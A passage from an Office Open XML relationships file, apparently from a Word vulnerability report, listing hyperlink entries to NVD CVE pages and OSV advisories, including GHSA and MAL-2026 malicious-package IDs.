Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101907" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101908" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101909" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101915" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101916" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101918" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102270" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19253" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51852" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51853" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51856" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51857" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51864" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51866" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76169" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80490" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81739" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81809" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84377" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84428" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84469" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84504" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86610" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87817" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87818" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87819" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87970" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87973" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89296" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90776" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90972" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90974" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91776" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91777" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92081" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92172" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92173" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92412" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93981" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96173" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96200" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96255" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-3hv7-mjh2-fv65" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-96h4-vgxj-gvm2" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-9c5c-9qcx-q35q" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-c2m8-h5v5-343r" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-chx6-46f5-w4vp" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-p98j-92pf-mc4p" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-vcvr-r3jv-pc5j" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17339" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17340" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17341" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17342" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17343" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17344" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17345" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17346" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17347" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17348" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17349" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17350" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17351" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17352" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17353" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17354" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17355" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17356" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17357" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17358" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17359" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17360" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17361" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17362" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17363" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17364" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17365" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17366" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17367" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17368" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17369" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17370" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17371" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17372" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17373" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17374" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17375" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17376" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17377" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17378" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17379" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17380" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17381" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17382" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17383" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17384" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17385" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17386" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17387" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17388" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17389" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17390" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17391" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17392" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17393" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17394" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17395" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17396" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17397" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17398" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17399" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17400" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17401" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17402" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17403" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17404" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17405" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17406" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17407" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17408" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17409" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17410" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17411" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17412" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17413" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17414" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17415" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17416" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17417" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103056" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101894" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102268" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97689" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67993" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95362" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100700" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103043" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61519" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100702" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95301" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95344" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95376" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97687" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102276" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102278" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102281" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54873" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102266" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102267" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102271" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102272" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102273" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100699" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97688" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102310" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102320" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102330" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95297" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95330" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95366" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81872" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95375" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102329" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103049" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102274" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79534" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102845" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102908" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102909" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95287" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95290" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95352" TargetMode="External" Id="rId352" /><Relationship 